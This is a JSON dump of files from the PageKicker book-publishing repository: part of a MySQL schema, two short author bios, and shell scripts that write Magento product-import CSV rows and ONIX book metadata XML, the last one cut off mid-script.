`PRIMARY` int(11) NOT NULL AUTO_INCREMENT,\n `LANG` enum('en_US.UTF-8','cs_CZ.UTF-8','it_IT.UTF-8') NOT NULL DEFAULT 'en_US.UTF-8' COMMENT 'environment variable value',\n PRIMARY KEY (`PRIMARY`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=348 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `robots`\n--\n\nCREATE TABLE IF NOT EXISTS `robots` (\n `robot_id` int(11) NOT NULL AUTO_INCREMENT,\n `robot_name` text NOT NULL,\n `robot_bio` text NOT NULL,\n `robot_dedication` text NOT NULL,\n `robot_summarizer_on` text NOT NULL,\n `robot_positive_summary_seed` text NOT NULL,\n `robot_positive_summary_seed_weight` int(11) NOT NULL,\n `robot_summary_length` int(11) NOT NULL DEFAULT '10',\n `robot_negative_seeds` text NOT NULL,\n `robot_negative_seed_weight` int(11) NOT NULL,\n `robot_coverfont` text NOT NULL,\n `robot_covercolor` text NOT NULL,\n `robot_userlogo_path` text NOT NULL,\n `robot_image_path` text NOT NULL,\n `robot_first_name` text NOT NULL,\n `robot_middle_name` text NOT NULL,\n `robot_last_name` text NOT NULL,\n `robot_fortune_db` text NOT NULL,\n `robot_ngram_threshold` int(11) NOT NULL DEFAULT '2',\n `robot_language` enum('en_US.UTF-8','cs_CZ.UTF-8','it_IT.UTF-8') NOT NULL DEFAULT 'en_US.UTF-8',\n `robot_booktype` enum('Reader') NOT NULL DEFAULT 'Reader',\n `robot_rows` int(11) NOT NULL,\n `robot_experience_points_initial` int(11) NOT NULL,\n `robot_experience_points_now` int(11) NOT NULL DEFAULT '100',\n PRIMARY KEY (`robot_id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=24 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `seeds`\n--\n\nCREATE TABLE IF NOT EXISTS `seeds` (\n `uuid` mediumtext NOT NULL,\n `seed` mediumtext NOT NULL,\n `seedsource` mediumtext NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `skus`\n--\n\nCREATE TABLE IF NOT EXISTS `skus` (\n `sku` bigint(20) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`sku`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `standalone_print_cover_builds`\n--\n\nCREATE TABLE IF NOT EXISTS `standalone_print_cover_builds` (\n `ISBN` mediumtext NOT NULL,\n `covertitle` mediumtext NOT NULL,\n `shorttitle` mediumtext NOT NULL,\n `editedby` mediumtext NOT NULL,\n `spinepixels` int(11) NOT NULL,\n `covercolor` mediumtext NOT NULL,\n `coverfontcolor` mediumtext NOT NULL,\n `coverfont` mediumtext NOT NULL,\n `submitted_to_LSI` tinyint(1) NOT NULL DEFAULT '0',\n `uuid` mediumtext NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='to track cover build jobs';\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `user_credits`\n--\n\nCREATE TABLE IF NOT EXISTS `user_credits` (\n `user_id` int(11) NOT NULL AUTO_INCREMENT,\n `user_points_initial` int(11) NOT NULL,\n `user_points_now` int(11) NOT NULL,\n PRIMARY KEY (`user_id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;\n\n/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n" }, { "alpha_fraction": 0.767578125, "alphanum_fraction": 0.791015625, "avg_line_length": 84.33333587646484, "blob_id": "badb8ff5a97551c302402f33634e752921afbfbf", "content_id": "a77852a37f627d25c5d0373a09cd8caf2e373aee", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 512, "license_type": "permissive", "max_line_length": 126, "num_lines": 6, "path": "/conf/jobprofiles/authorbios/Bittersteel.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "First came the bitcoin protocol in 2008, then the green light for production HBO's Game of Thrones in 2010. Sometime shortly \nthereafter the AI known as Bittersteel emerged into public notice as the leader of the \ngang of financial robots known as the \"The Golden Company\" in their so far futile quest \nto overthrow the fiat currency that has held Westeros in thrall since the Nixon Shock of \n1971. Bittersteel is known as hard, choleric, and quick to take offense -- never one to \nshy away from a Tweetfight!\n" }, { "alpha_fraction": 0.800000011920929, "alphanum_fraction": 0.800000011920929, "avg_line_length": 89, "blob_id": "a067795005ab967891e6a2a2aee64e8d6f656e9e", "content_id": "6f56cbbd4a99e263ce59f834310420aa92ef12fc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 450, "license_type": "permissive", "max_line_length": 190, "num_lines": 5, "path": "/conf/jobprofiles/authorbios/Frank_L..md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Frank has been a nut about architecture all his digital life. He has been a fan of diverse styles like Gehry and Lutyens and has searched the internet for the best architecture to be found. \n\nAs a proud member of the PageKicker team, Frank has been working on a series of famous buildings and structures. He hopes his work will some day be truly comprehensive.\n\nIn his spare time Frank designs on auto cad and likes to collect topping out postcards.\n" }, { "alpha_fraction": 0.6935665607452393, "alphanum_fraction": 0.704120934009552, "avg_line_length": 25.683544158935547, "blob_id": "ad85b44e6f4bcb572206f22b8bf8f5d548bdf9ca", "content_id": "447f0e8de23eb451a83c5998277f0d29cfac966e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 16865, "license_type": "permissive", "max_line_length": 350, "num_lines": 632, "path": "/scripts/includes/builder-metadata-footer.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\n# this is an updated metadata builder to accommodate new product columns\n# created by downloadable builder software\n\n# now need to also incorporate dat-builder metadata settings\n\nif [ \"$dat\" = \"yes\" ] ; then\n\tcategories=\"16\"\n\tproductnamefull=\"$uploaded_tat_file\"\n\tproductname=`echo \"$productnamefull\"|colrm 20`\n\tproductname=$productname\"...\"\n\tbooktitle=\"Analysis of \"$productname\n\tlinks_title=\"Document Analysis Results\"\nelse\n\tlinks_title=\"Formats\"\nfi\n\ncreatetime=$(( `date +%s` ))\n\necho \"createtime is \" $createtime >> $sfb_log\n\nspecial_price=0.00\n\n#list of all metadata fields begins here\n\n#store\n\necho -n \"$storecode,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# websites\n\necho -n \"$websites,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# attribute set\n\necho -n \"$attribute_set,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# type\n\necho -n \"$type,\">> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# 16 is Document Analysis Reports category, 4 is catalog\n program &> /dev/null\necho -n '\"'$categories'\"'\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# sku\n\n#case \"$storecode\" in\n# set sku root\n#;;\n# esac\n\necho -n \"$sku,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# has options\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# name\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"$booktitle\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta title\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"$booktitle\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta_description\n\n# see https://yoast.com/meta-descriptions/ for info about how to compose\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# image\n\n# [ ! -f $TMPDIR$uuid/$sku\"wordcloudbig.png\" ] && cp $TMPDIR$uuid/$sku\"wordcloudbig.png\" $TMPDIR$uuid$sku\"ebookcover.jpg\"\n\necho -n \"/\"$uuid/$sku\"ebookcover.jpg,\" >> $metadatatargetpath\"$uuid/current-import.csv\"\n\n# small_image\n\necho -n \"/\"$uuid/$sku\"ebookcover.jpg,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# thumbnail\n program &> /dev/null\necho -n \"/\"$uuid/$sku\"ebookcover.jpg,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# url_key\n\necho -n \"$sku,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# url_path\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# config_attributes\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# custom design\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# page_layout\n\necho -n \"No layout updates,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# options_container\n program &> /dev/null\necho -n \"Block after Info Column,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# msrp_enabled\n\necho -n \"Use config,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# msrp_display_actual_price_type\necho -n \"Use config,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# gift_message_available\n\necho -n \"Use config,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# samples_title\n\necho -n \"Samples,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n# links_title\n\n program &> /dev/null\necho -n \"$links_title,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# editorid\n\necho -n \"$customerid,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# wordcount\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# seedsource\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# editedby\n\necho -n \"$customername,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# external_uniqid\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# xml_file\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# price\n\nif [ \"$pricing\" = \"yes\" ] ; then\n\t./includes/pricing.sh\nelse\n\ttrue\nfi\n\necho -n \"$price,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# special_price\n\nif [ \"$special_pricing\" = \"yes\" ] ; then\n\techo -n \"$special_price,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\nelse\n\techo -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\nfi\n\n# cost\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# msrp\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# status\n\necho -n \"$status,\" >> $metadatatargetpath$uuid\"/current-import.csv\" \n\n# visibility\n\necho -n '\"'Catalog, Search'\"', >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# tax_class_id\n\necho -n \"None,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# links_purchased_separately\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# links_exist\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# ebizmarts_mark_visited\n\necho -n \"Yes,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# (is) featured\n\necho -n \"Yes,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# description\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\ncat includes/wikilicense.txt >> $TMPDIR$uuid/book-description.txt\ncat $TMPDIR$uuid/book-description.txt | sed -e 's/\"/_/'g >> $metadatatargetpath$uuid\"/current-import.csv\"\n# add process.md\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# short_description\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\ncat $TMPDIR$uuid/tldr.txt | sed -e 's/\"/_/'g >> $metadatatargetpath$uuid\"/current-import.csv\"\n# cat $TMPDIR$uuid/book-description.txt | sed -e 's/\"/_/'g >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# meta_keyword\n\n# printf \"%s\" \"$(cat $TMPDIR$uuid/seeds/sorted.seedfile)\" | sed -e 's/\"/_/'g -e 's/\\n/, /'g >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# custom_layout_update\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# downloadable_link_emaildeliver\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\n# special_from_date\n\nspecial_from=$createtime\n\n(( special_from = createtime - 86400 ))\n\nspecial_from_date=`date -d @$special_from +'%m/%d/%Y%n %H:%M:%S'`\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \"$special_from_date\" >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# special_to_date\n\nminutes=$special_lasts_minutes # read from config or command line default 43,200 = 1 hour\n\nspecial_lasts_sec=$(( $minutes * 60))\n\n(( special_to = createtime + special_lasts_sec ))\n\n\nspecial_to_date=`date -d @$special_to +'%m/%d/%Y%n %H:%M:%S'`\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \"$special_to_date\" >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\n# new(s)_from_date\n\nnews_from=$createtime\n\n(( news_from = createtime - 86400 ))\n\nnews_from_date=`date -d @$news_from +'%m/%d/%Y%n %H:%M:%S'`\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \"$news_from_date\" >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# new(s) to_date\n\nnews_minutes=$news_lasts_minutes # read from config or command line default 43,200 = 1 hour\n\nnews_lasts_sec=$(( $news_lasts_minutes * 60))\n\n\n(( news_to = createtime + news_lasts_sec ))\n\nnews_to_date=`date -d @$news_to +'%m/%d/%Y%n %H:%M:%S'`\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \"$news_to_date\" >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# custom_design_from\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# custom_design_to\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# min_qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_min_qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is_qty_decimal\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# backorders\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_backorders\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# min_sale_qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_min_sale_qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# max_sale_qty\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_max_sale_qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is_in_stock\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# low_stock_date\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# notify_stock_qty\n\necho -n \"0,\" >> $metadatatargetpath$uuid/\"current-import.csv\"\n\n# use_config_notify_stock_qty\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# manage_stock\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_manage_stock\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# stock_status_changed_auto\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_qty_increments\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# qty_increments\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_enable_qty_inc\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# enable_qty_increments\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is_decimal_divided\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# stock_status_changed_automatically\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# use_config_enable_qty_increments\n\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# product_name\nbashsafe_product_name=$(echo \"$booktitle\" | sed -e '/[|,&<>]/g')\n\necho -n \"$bashsafe_product_name,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# store_id\n\necho -n \"$storeids,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# product_type_id\n\necho -n \"downloadable,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# product_status_changed\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# product_changed_websites\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# gallery\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# gallery_label\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# related\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# upsell\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# crosssell\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# tier_prices\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# associated\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# bundle_options\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# grouped\n\necho -n \"0,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# group_price\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\n# downloadable_options\n\nif [ \"$dat\" = \"yes\" ] ; then\n\n\tlink1name=\"Poster_Sized_Word_Cloud\"\n\tlink2name=\"Candidate_Acronyms\"\n\tlink3name=\"Readability_Report\"\n\tlink4name=\"Keywords\"\n\tlink5name=\"Automatic_Summary\"\n\tlink6name=\"All_Images_Montage\"\n\tlink7name=\"Top_N_Images_Montage\"\n\tfilename1=\"$sku\"wordcloudbig.png\n\tfilename2=\"$sku\"acronyms.txt\n\tfilename3=\"$sku\"rr.pdf\n\tfilename4=\"$sku\"all_nouns.txt\n\tfilename5=\"$sku\"summary.txt\n\tfilename6=\"$sku\"montage.jpg\n\tfilename7=\"$sku\"montagetopn.jpg\n\n\tpipe=\"|\"\n\n\tif [ \"$montageur_success\" = 0 ] ; then\n\n\t\techo \"montageur ran successfully so adding links for montages to metadata\" | tee --append $xform_log\n\n\t\techo -n '\"'$link1name,0,9,file,$uuid/$filename1$pipe$link2name,0,9,file,$uuid/$filename2$pipe$link3name,0,9,file,$uuid/$filename3$pipe$link4name,0,9,file,$uuid/$filename4$pipe$link5name,0,9,file,$uuid/$filename5$pipe$link6name,0,9,file,$uuid/$filename6$pipe$link7name,0,9,file,$uuid/$filename7'\"'\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\n\telse\n\n\t\techo \"montageur did not run successfully so not adding links for montages\" | tee --append $xform_log\n\n\t\techo -n '\"'$link1name,0,9,file,$uuid/$filename1$pipe$link2name,0,9,file,$uuid/$filename2$pipe$link3name,0,9,file,$uuid/$filename3$pipe$link4name,0,9,file,$uuid/$filename4$pipe$link5name,0,9,file,$uuid/$filename5'\"'\",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\tfi\n\nelse\n# note that file path is relative to media/import because that's where Magento (not SFB) assumes the file will be\n\n\t# echo -n '\"'$epublinkrichname,0,9,file,$uuid/$sku'linkrich.epub'$pipe$docxname,0,9,file,$uuid/$sku'.docx'$pipe$epublinkname,0,9,file,$uuid/$sku'plaintxt.epub'$pipe$mobilinkname,0,9,file,$uuid/$sku'.mobi'$pipe$pdflinkname,0,9,file,$uuid/\"$sku\"print_color.pdf'\"', >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\tif [ \"$environment\" = \"Production\" ] ; then\n\n\t\techo -n '\"'$mobilinkname,0,9,builder,12$pipe$epublinkname,0,9,builder,9$pipe$docxlinkname,0,9,builder,10'\"', >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\telif [ \"$environment\" = \"Staging\" ] ; then\n\n\t\techo -n '\"'$mobilinkname,0,9,builder,15$pipe$epublinkname,0,9,builder,13$pipe$docxlinkname,0,9,builder,14'\"', >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\telse\n\n\techo -n '\"'$mobilinkname,0,9,builder,12$pipe$epublinkname,0,9,builder,9$pipe$docxlinkname,0,9,builder,10'\"', >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n\tfi\n\nfi\n\n# downloadable_sample_options\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# super_attribute_pricing\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# product_tags\n\n# . includes/keyword-reader\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# is_recurring\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n# image_label\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"$booktitle cover\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# small_image_label\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"$booktitle small cover\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# thumbnail_label\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \"$booktitle thumbnail\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# job profile name\necho -n \"$jobprofilename,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# downloadable_additional_clogin\necho -n \"1,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# country of manufacture\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# weight\n\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# book types such as Reader, NodeHome, Spider, etc.\n\necho -n \"$booktype,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# seeds to catalog\n\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\nprintf \"%s\" \"$(cat $TMPDIR$uuid/seeds/sorted.seedfile)\" | sed -e 's/\"/_/'g >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n '\"' >> $metadatatargetpath$uuid\"/current-import.csv\"\necho -n \",\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# imprint\n\necho -n \"$imprint,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# customer id for revenue sharing\n\necho -n \"$customerid,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# safe product name\n\nsafe_product_name=$(echo \"$booktitle\" | sed -e 's/[^A-Za-z0-9._-]/_/g' | sed -e 's/,/_/g')\necho -n \"$safe_product_name,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n# wikilang\necho -n \"$wikilang,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#coverfont\n\necho -n \"$coverfont,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n#covercolor\n\necho -n \"$covercolor,\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n\n #final line has different echo format\n\necho \"0\" >> $metadatatargetpath$uuid\"/current-import.csv\"\n" }, { "alpha_fraction": 0.6959459185600281, "alphanum_fraction": 0.7030405402183533, "avg_line_length": 59.408164978027344, "blob_id": "faef5c53b613697b9e85891c6452162aebae3ec4", "content_id": "3753828651f75ffa6bd0e9a7cf0bd32ffab321f6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2960, "license_type": "permissive", "max_line_length": 141, "num_lines": 49, "path": "/scripts/includes/write-ONIX-metadata.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "YYYYMMDD=`date +'%Y%m%d'`\n\nYYYYMMDDHHSS=`date +'%Y%m%d%k%M'`\n\nYYYY=`date +'%Y'`\n\necho \"<?xml version=\"$dq\"1.0\"$dq\"?>\" >> tmp/$uuid/onix-working.xml\necho \"<!DOCTYPE ONIXMessage SYSTEM \"$dq\"http://www.editeur.org/onix/2.1/reference/onix-international.dtd\"$dq\">\" >> tmp/$uuid/onix-working.xml\necho \"<ONIXMessage>\" >> tmp/$uuid/onix-working.xml\necho \"<Header>\" >> tmp/$uuid/onix-working.xml\necho \" <FromCompany>PageKicker</FromCompany>\" >> tmp/$uuid/onix-working.xml\necho \" <FromPerson>[email protected]</FromPerson>\" >> tmp/$uuid/onix-working.xml\necho \" <SentDate>$YYYYMMDD</SentDate>\" >> tmp/$uuid/onix-working.xml\necho \" <DefaultLanguageOfText>eng</DefaultLanguageOfText>\" >> tmp/$uuid/onix-working.xml\necho \"</Header>\" >> tmp/$uuid/onix-working.xml\n echo \"<Product>\" >> tmp/$uuid/onix-working.xml\n echo \" <RecordReference>\"$sku\"</RecordReference>\" >> tmp/$uuid/onix-working.xml\n echo \" <NotificationType>03</NotificationType>\" >> tmp/$uuid/onix-working.xml\necho \" <ProductIdentifier>\" >> tmp/$uuid/onix-working.xml\necho \" <ProductIDType>15</ProductIDType>\" >> tmp/$uuid/onix-working.xml\n echo \" <IDValue>$ISBN</IDValue>\" >> tmp/$uuid/onix-working.xml\necho \" </ProductIdentifier>\" >> tmp/$uuid/onix-working.xml\necho \"<ProductForm>DG</ProductForm>\" >> tmp/$uuid/onix-working.xml\necho \"<EpubType>029</EpubType>\" >> tmp/$uuid/onix-working.xml\necho \"<EpubFormatDescription>Epub</EpubFormatDescription>\" >> tmp/$uuid/onix-working.xml\necho \"<Title>\" >> tmp/$uuid/onix-working.xml\necho \"<TitleType>01</TitleType>\" >> tmp/$uuid/onix-working.xml\necho \"<TitleText>$covertitle</TitleText>\" >> tmp/$uuid/onix-working.xml\necho \"</Title>\" >> tmp/$uuid/onix-working.xml\necho \"<Contributor>\" >> tmp/$uuid/onix-working.xml\necho \" <SequenceNumber>1</SequenceNumber>\" >> tmp/$uuid/onix-working.xml\necho \" <ContributorRole>A01</ContributorRole>\" >> tmp/$uuid/onix-working.xml\necho \" <NamesBeforeKey> \"$firstname\"</NamesBeforeKey>\" >> tmp/$uuid/onix-working.xml\necho \" <KeyNames>$lastname</KeyNames>\" >> tmp/$uuid/onix-working.xml\necho \"<BiographicalNote>\" >> tmp/$uuid/onix-working.xml\ncat \"$authorbio\" | html2text >> tmp/$uuid/onix-working.xml\necho \"</BiographicalNote>\" >> tmp/$uuid/onix-working.xml\necho \"</Contributor>\" >> tmp/$uuid/onix-working.xml\necho \"<Publisher>\" >> tmp/$uuid/onix-working.xml\necho \" <PublishingRole>01</PublishingRole>\" >> tmp/$uuid/onix-working.xml\necho \" <PublisherName>PageKicker</PublisherName>\" >> tmp/$uuid/onix-working.xml\necho \"</Publisher>\" >> tmp/$uuid/onix-working.xml\necho \"<SalesRights>\" >> tmp/$uuid/onix-working.xml\necho \" <SalesRightsType>01</SalesRightsType>\" >> tmp/$uuid/onix-working.xml\necho \" <RightsCountry>US GB </RightsCountry>\" >> 